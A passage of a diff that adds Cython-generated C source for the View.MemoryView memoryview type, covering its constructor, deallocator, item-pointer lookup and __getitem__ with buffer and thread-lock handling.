!= Py_None); + __pyx_t_1 = __pyx_t_2; + __pyx_L4_bool_binop_done:; + if (__pyx_t_1) { + + /* "View.MemoryView":353 + * self.flags = flags + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) # <<<<<<<<<<<<<< + * if self.view.obj == NULL: + * (<__pyx_buffer *> &self.view).obj = Py_None + */ + __pyx_t_3 = __Pyx_GetBuffer(__pyx_v_obj, (&__pyx_v_self->view), __pyx_v_flags); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 353, __pyx_L1_error) + + /* "View.MemoryView":354 + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: # <<<<<<<<<<<<<< + * (<__pyx_buffer *> &self.view).obj = Py_None + * Py_INCREF(Py_None) + */ + __pyx_t_1 = (((PyObject *)__pyx_v_self->view.obj) == NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":355 + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: + * (<__pyx_buffer *> &self.view).obj = Py_None # <<<<<<<<<<<<<< + * Py_INCREF(Py_None) + * + */ + ((Py_buffer *)(&__pyx_v_self->view))->obj = Py_None; + + /* "View.MemoryView":356 + * if self.view.obj == NULL: + * (<__pyx_buffer *> &self.view).obj = Py_None + * Py_INCREF(Py_None) # <<<<<<<<<<<<<< + * + * if not __PYX_CYTHON_ATOMICS_ENABLED(): + */ + Py_INCREF(Py_None); + + /* "View.MemoryView":354 + * if type(self) is memoryview or obj is not None: + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: # <<<<<<<<<<<<<< + * (<__pyx_buffer *> &self.view).obj = Py_None + * Py_INCREF(Py_None) + */ + } + + /* "View.MemoryView":352 + * self.obj = obj + * self.flags = flags + * if type(self) is memoryview or obj is not None: # <<<<<<<<<<<<<< + * __Pyx_GetBuffer(obj, &self.view, flags) + * if self.view.obj == NULL: + */ + } + + /* "View.MemoryView":358 + * Py_INCREF(Py_None) + * + * if not __PYX_CYTHON_ATOMICS_ENABLED(): # <<<<<<<<<<<<<< + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: + */ + __pyx_t_1 = (!__PYX_CYTHON_ATOMICS_ENABLED()); + if (__pyx_t_1) { + + /* "View.MemoryView":360 + * if not __PYX_CYTHON_ATOMICS_ENABLED(): + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: # <<<<<<<<<<<<<< + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + */ + __pyx_t_1 = (__pyx_memoryview_thread_locks_used < 8); + if (__pyx_t_1) { + + /* "View.MemoryView":361 + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: + */ + __pyx_v_self->lock = (__pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used]); + + /* "View.MemoryView":362 + * if __pyx_memoryview_thread_locks_used < 8: + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 # <<<<<<<<<<<<<< + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() + */ + __pyx_memoryview_thread_locks_used = (__pyx_memoryview_thread_locks_used + 1); + + /* "View.MemoryView":360 + * if not __PYX_CYTHON_ATOMICS_ENABLED(): + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: # <<<<<<<<<<<<<< + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + */ + } + + /* "View.MemoryView":363 + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: # <<<<<<<<<<<<<< + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: + */ + __pyx_t_1 = (__pyx_v_self->lock == NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":364 + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() # <<<<<<<<<<<<<< + * if self.lock is NULL: + * raise MemoryError + */ + __pyx_v_self->lock = PyThread_allocate_lock(); + + /* "View.MemoryView":365 + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + __pyx_t_1 = (__pyx_v_self->lock == NULL); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":366 + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: + * raise MemoryError # <<<<<<<<<<<<<< + * + * if flags & PyBUF_FORMAT: + */ + PyErr_NoMemory(); __PYX_ERR(1, 366, __pyx_L1_error) + + /* "View.MemoryView":365 + * if self.lock is NULL: + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * + */ + } + + /* "View.MemoryView":363 + * self.lock = __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] + * __pyx_memoryview_thread_locks_used += 1 + * if self.lock is NULL: # <<<<<<<<<<<<<< + * self.lock = PyThread_allocate_lock() + * if self.lock is NULL: + */ + } + + /* "View.MemoryView":358 + * Py_INCREF(Py_None) + * + * if not __PYX_CYTHON_ATOMICS_ENABLED(): # <<<<<<<<<<<<<< + * global __pyx_memoryview_thread_locks_used + * if __pyx_memoryview_thread_locks_used < 8: + */ + } + + /* "View.MemoryView":368 + * raise MemoryError + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') + * else: + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_FORMAT) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":369 + * + * if flags & PyBUF_FORMAT: + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') # <<<<<<<<<<<<<< + * else: + * self.dtype_is_object = dtype_is_object + */ + __pyx_t_2 = ((__pyx_v_self->view.format[0]) == 'O'); + if (__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L12_bool_binop_done; + } + __pyx_t_2 = ((__pyx_v_self->view.format[1]) == '\x00'); + __pyx_t_1 = __pyx_t_2; + __pyx_L12_bool_binop_done:; + __pyx_v_self->dtype_is_object = __pyx_t_1; + + /* "View.MemoryView":368 + * raise MemoryError + * + * if flags & PyBUF_FORMAT: # <<<<<<<<<<<<<< + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') + * else: + */ + goto __pyx_L11; + } + + /* "View.MemoryView":371 + * self.dtype_is_object = (self.view.format[0] == b'O' and self.view.format[1] == b'\0') + * else: + * self.dtype_is_object = dtype_is_object # <<<<<<<<<<<<<< + * + * assert (&self.acquisition_count) % sizeof(__pyx_atomic_int_type) == 0 + */ + /*else*/ { + __pyx_v_self->dtype_is_object = __pyx_v_dtype_is_object; + } + __pyx_L11:; + + /* "View.MemoryView":373 + * self.dtype_is_object = dtype_is_object + * + * assert (&self.acquisition_count) % sizeof(__pyx_atomic_int_type) == 0 # <<<<<<<<<<<<<< + * self.typeinfo = NULL + * + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_4 = ((Py_intptr_t)((void *)(&__pyx_v_self->acquisition_count))); + __pyx_t_5 = (sizeof(__pyx_atomic_int_type)); + if (unlikely(__pyx_t_5 == 0)) { + PyErr_SetString(PyExc_ZeroDivisionError, "integer division or modulo by zero"); + __PYX_ERR(1, 373, __pyx_L1_error) + } + __pyx_t_1 = ((__pyx_t_4 % __pyx_t_5) == 0); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(1, 373, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(1, 373, __pyx_L1_error) + #endif + + /* "View.MemoryView":374 + * + * assert (&self.acquisition_count) % sizeof(__pyx_atomic_int_type) == 0 + * self.typeinfo = NULL # <<<<<<<<<<<<<< + * + * def __dealloc__(memoryview self): + */ + __pyx_v_self->typeinfo = NULL; + + /* "View.MemoryView":349 + * cdef __Pyx_TypeInfo *typeinfo + * + * def __cinit__(memoryview self, object obj, int flags, bint dtype_is_object=False): # <<<<<<<<<<<<<< + * self.obj = obj + * self.flags = flags + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":376 + * self.typeinfo = NULL + * + * def __dealloc__(memoryview self): # <<<<<<<<<<<<<< + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + */ + +/* Python wrapper */ +static void __pyx_memoryview___dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_memoryview___dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_2__dealloc__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_2__dealloc__(struct __pyx_memoryview_obj *__pyx_v_self) { + int __pyx_v_i; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_t_4; + PyThread_type_lock __pyx_t_5; + PyThread_type_lock __pyx_t_6; + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "View.MemoryView":377 + * + * def __dealloc__(memoryview self): + * if self.obj is not None: # <<<<<<<<<<<<<< + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + */ + __pyx_t_1 = (__pyx_v_self->obj != Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":378 + * def __dealloc__(memoryview self): + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) # <<<<<<<<<<<<<< + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + * + */ + __Pyx_ReleaseBuffer((&__pyx_v_self->view)); + + /* "View.MemoryView":377 + * + * def __dealloc__(memoryview self): + * if self.obj is not None: # <<<<<<<<<<<<<< + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":379 + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: # <<<<<<<<<<<<<< + * + * (<__pyx_buffer *> &self.view).obj = NULL + */ + __pyx_t_1 = (((Py_buffer *)(&__pyx_v_self->view))->obj == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":381 + * elif (<__pyx_buffer *> &self.view).obj == Py_None: + * + * (<__pyx_buffer *> &self.view).obj = NULL # <<<<<<<<<<<<<< + * Py_DECREF(Py_None) + * + */ + ((Py_buffer *)(&__pyx_v_self->view))->obj = NULL; + + /* "View.MemoryView":382 + * + * (<__pyx_buffer *> &self.view).obj = NULL + * Py_DECREF(Py_None) # <<<<<<<<<<<<<< + * + * cdef int i + */ + Py_DECREF(Py_None); + + /* "View.MemoryView":379 + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + * elif (<__pyx_buffer *> &self.view).obj == Py_None: # <<<<<<<<<<<<<< + * + * (<__pyx_buffer *> &self.view).obj = NULL + */ + } + __pyx_L3:; + + /* "View.MemoryView":386 + * cdef int i + * global __pyx_memoryview_thread_locks_used + * if self.lock != NULL: # <<<<<<<<<<<<<< + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: + */ + __pyx_t_1 = (__pyx_v_self->lock != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":387 + * global __pyx_memoryview_thread_locks_used + * if self.lock != NULL: + * for i in range(__pyx_memoryview_thread_locks_used): # <<<<<<<<<<<<<< + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 + */ + __pyx_t_2 = __pyx_memoryview_thread_locks_used; + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":388 + * if self.lock != NULL: + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: + */ + __pyx_t_1 = ((__pyx_memoryview_thread_locks[__pyx_v_i]) == __pyx_v_self->lock); + if (__pyx_t_1) { + + /* "View.MemoryView":389 + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 # <<<<<<<<<<<<<< + * if i != __pyx_memoryview_thread_locks_used: + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + */ + __pyx_memoryview_thread_locks_used = (__pyx_memoryview_thread_locks_used - 1); + + /* "View.MemoryView":390 + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + */ + __pyx_t_1 = (__pyx_v_i != __pyx_memoryview_thread_locks_used); + if (__pyx_t_1) { + + /* "View.MemoryView":392 + * if i != __pyx_memoryview_thread_locks_used: + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) # <<<<<<<<<<<<<< + * break + * else: + */ + __pyx_t_5 = (__pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used]); + __pyx_t_6 = (__pyx_memoryview_thread_locks[__pyx_v_i]); + + /* "View.MemoryView":391 + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + * break + */ + (__pyx_memoryview_thread_locks[__pyx_v_i]) = __pyx_t_5; + (__pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used]) = __pyx_t_6; + + /* "View.MemoryView":390 + * if __pyx_memoryview_thread_locks[i] is self.lock: + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + */ + } + + /* "View.MemoryView":393 + * __pyx_memoryview_thread_locks[i], __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used] = ( + * __pyx_memoryview_thread_locks[__pyx_memoryview_thread_locks_used], __pyx_memoryview_thread_locks[i]) + * break # <<<<<<<<<<<<<< + * else: + * PyThread_free_lock(self.lock) + */ + goto __pyx_L6_break; + + /* "View.MemoryView":388 + * if self.lock != NULL: + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: # <<<<<<<<<<<<<< + * __pyx_memoryview_thread_locks_used -= 1 + * if i != __pyx_memoryview_thread_locks_used: + */ + } + } + /*else*/ { + + /* "View.MemoryView":395 + * break + * else: + * PyThread_free_lock(self.lock) # <<<<<<<<<<<<<< + * + * cdef char *get_item_pointer(memoryview self, object index) except NULL: + */ + PyThread_free_lock(__pyx_v_self->lock); + } + __pyx_L6_break:; + + /* "View.MemoryView":386 + * cdef int i + * global __pyx_memoryview_thread_locks_used + * if self.lock != NULL: # <<<<<<<<<<<<<< + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: + */ + } + + /* "View.MemoryView":376 + * self.typeinfo = NULL + * + * def __dealloc__(memoryview self): # <<<<<<<<<<<<<< + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":397 + * PyThread_free_lock(self.lock) + * + * cdef char *get_item_pointer(memoryview self, object index) except NULL: # <<<<<<<<<<<<<< + * cdef Py_ssize_t dim + * cdef char *itemp = self.view.buf + */ + +static char *__pyx_memoryview_get_item_pointer(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index) { + Py_ssize_t __pyx_v_dim; + char *__pyx_v_itemp; + PyObject *__pyx_v_idx = NULL; + char *__pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t __pyx_t_3; + PyObject *(*__pyx_t_4)(PyObject *); + PyObject *__pyx_t_5 = NULL; + Py_ssize_t __pyx_t_6; + char *__pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_item_pointer", 0); + + /* "View.MemoryView":399 + * cdef char *get_item_pointer(memoryview self, object index) except NULL: + * cdef Py_ssize_t dim + * cdef char *itemp = self.view.buf # <<<<<<<<<<<<<< + * + * for dim, idx in enumerate(index): + */ + __pyx_v_itemp = ((char *)__pyx_v_self->view.buf); + + /* "View.MemoryView":401 + * cdef char *itemp = self.view.buf + * + * for dim, idx in enumerate(index): # <<<<<<<<<<<<<< + * itemp = pybuffer_index(&self.view, itemp, idx, dim) + * + */ + __pyx_t_1 = 0; + if (likely(PyList_CheckExact(__pyx_v_index)) || PyTuple_CheckExact(__pyx_v_index)) { + __pyx_t_2 = __pyx_v_index; __Pyx_INCREF(__pyx_t_2); __pyx_t_3 = 0; + __pyx_t_4 = NULL; + } else { + __pyx_t_3 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_v_index); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 401, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_4)) { + if (likely(PyList_CheckExact(__pyx_t_2))) { + if (__pyx_t_3 >= PyList_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_5 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_3); __Pyx_INCREF(__pyx_t_5); __pyx_t_3++; if (unlikely((0 < 0))) __PYX_ERR(1, 401, __pyx_L1_error) + #else + __pyx_t_5 = PySequence_ITEM(__pyx_t_2, __pyx_t_3); __pyx_t_3++; if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + #endif + } else { + if (__pyx_t_3 >= PyTuple_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_5 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_3); __Pyx_INCREF(__pyx_t_5); __pyx_t_3++; if (unlikely((0 < 0))) __PYX_ERR(1, 401, __pyx_L1_error) + #else + __pyx_t_5 = PySequence_ITEM(__pyx_t_2, __pyx_t_3); __pyx_t_3++; if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + #endif + } + } else { + __pyx_t_5 = __pyx_t_4(__pyx_t_2); + if (unlikely(!__pyx_t_5)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 401, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_5); + } + __Pyx_XDECREF_SET(__pyx_v_idx, __pyx_t_5); + __pyx_t_5 = 0; + __pyx_v_dim = __pyx_t_1; + __pyx_t_1 = (__pyx_t_1 + 1); + + /* "View.MemoryView":402 + * + * for dim, idx in enumerate(index): + * itemp = pybuffer_index(&self.view, itemp, idx, dim) # <<<<<<<<<<<<<< + * + * return itemp + */ + __pyx_t_6 = __Pyx_PyIndex_AsSsize_t(__pyx_v_idx); if (unlikely((__pyx_t_6 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 402, __pyx_L1_error) + __pyx_t_7 = __pyx_pybuffer_index((&__pyx_v_self->view), __pyx_v_itemp, __pyx_t_6, __pyx_v_dim); if (unlikely(__pyx_t_7 == ((char *)NULL))) __PYX_ERR(1, 402, __pyx_L1_error) + __pyx_v_itemp = __pyx_t_7; + + /* "View.MemoryView":401 + * cdef char *itemp = self.view.buf + * + * for dim, idx in enumerate(index): # <<<<<<<<<<<<<< + * itemp = pybuffer_index(&self.view, itemp, idx, dim) + * + */ + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":404 + * itemp = pybuffer_index(&self.view, itemp, idx, dim) + * + * return itemp # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_itemp; + goto __pyx_L0; + + /* "View.MemoryView":397 + * PyThread_free_lock(self.lock) + * + * cdef char *get_item_pointer(memoryview self, object index) except NULL: # <<<<<<<<<<<<<< + * cdef Py_ssize_t dim + * cdef char *itemp = self.view.buf + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.memoryview.get_item_pointer", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_idx); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":407 + * + * + * def __getitem__(memoryview self, object index): # <<<<<<<<<<<<<< + * if index is Ellipsis: + * return self + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index); /*proto*/ +static PyObject *__pyx_memoryview___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getitem__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_4__getitem__(((struct __pyx_memoryview_obj *)__pyx_v_self), ((PyObject *)__pyx_v_index)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_4__getitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index) { + PyObject *__pyx_v_have_slices = NULL; + PyObject *__pyx_v_indices = NULL; + char *__pyx_v_itemp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + char *__pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getitem__", 0); + + /* "View.MemoryView":408 + * + * def __getitem__(memoryview self, object index): + * if index is Ellipsis: # <<<<<<<<<<<<<< + * return self + * + */ + __pyx_t_1 = (__pyx_v_index == __pyx_builtin_Ellipsis); + if (__pyx_t_1) { + + /* "View.MemoryView":409 + * def __getitem__(memoryview self, object index): + * if index is Ellipsis: + * return self # <<<<<<<<<<<<<< + * + * have_slices, indices = _unellipsify(index, self.view.ndim) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_self); + __pyx_r = ((PyObject *)__pyx_v_self); + goto __pyx_L0; + + /* "View.MemoryView":408 + * + * def __getitem__(memoryview self, object index): + * if index is Ellipsis: # <<<<<<<<<<<<<< + * return self + * + */ + } + + /* "View.MemoryView":411 + * return self + * + * have_slices, indices = _unellipsify(index, self.view.ndim) # <<<<<<<<<<<<<< + * + * cdef char *itemp + */ + __pyx_t_2 = _unellipsify(__pyx_v_index, __pyx_v_self->view.ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 411, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (likely(__pyx_t_2 != Py_None)) { + PyObject* sequence = __pyx_t_2; + Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); + if (unlikely(size != 2)) { + if (size > 2) __Pyx_RaiseTooManyValuesError(2); + else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); + __PYX_ERR(1, 411, __pyx_L1_error) + } + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_3 = PyTuple_GET_ITEM(sequence, 0); + __pyx_t_4 = PyTuple_GET_ITEM(sequence, 1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + #else + __pyx_t_3 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 411, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 411, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } else { + __Pyx_RaiseNoneNotIterableError(); __PYX_ERR(1, 411, __pyx_L1_error) + } + __pyx_v_have_slices = __pyx_t_3; + __pyx_t_3 = 0; + __pyx_v_indices = __pyx_t_4; + __pyx_t_4 = 0; + + /* "View.MemoryView":414 + * + * cdef char *itemp + * if have_slices: # <<<<<<<<<<<<<< + * return memview_slice(self, indices) + * else: + */ + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_v_have_slices); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 414, __pyx_L1_error) + if (__pyx_t_1) { + + /* "View.MemoryView":415 + * cdef char *itemp + * if have_slices: + * return memview_slice(self, indices) # <<<<<<<<<<<<<< + * else: + * itemp = self.get_item_pointer(indices) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = ((PyObject *)__pyx_memview_slice(__pyx_v_self, __pyx_v_indices)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 415, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":414 + * + * cdef char *itemp + * if have_slices: # <<<<<<<<<<<<<< + * return memview_slice(self, indices) + * else: + */ + } + + /* "View.MemoryView":417 + * return memview_slice(self, indices) + * else: + * itemp = self.get_item_pointer(indices) # <<<<<<<<<<<<<< + * return self.convert_item_to_object(itemp) + * + */ + /*else*/ { + __pyx_t_5 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->get_item_pointer(__pyx_v_self, __pyx_v_indices); if (unlikely(__pyx_t_5 == ((char *)NULL))) __PYX_ERR(1, 417, __pyx_L1_error) + __pyx_v_itemp = __pyx_t_5; + + /* "View.MemoryView":418 + * else: + * itemp = self.get_item_pointer(indices) + * return self.convert_item_to_object(itemp) # <<<<<<<<<<<<<< + * + * def __setitem__(memoryview self, object index, object value): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->convert_item_to_object(__pyx_v_self, __pyx_v_itemp); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 418, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + } + + /* "View.MemoryView":407 + * + * + * def __getitem__(memoryview self, object index): # <<<<<<<<<<<<<< + * if index is Ellipsis: + * return self + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.memoryview.__getitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_have_slices); + 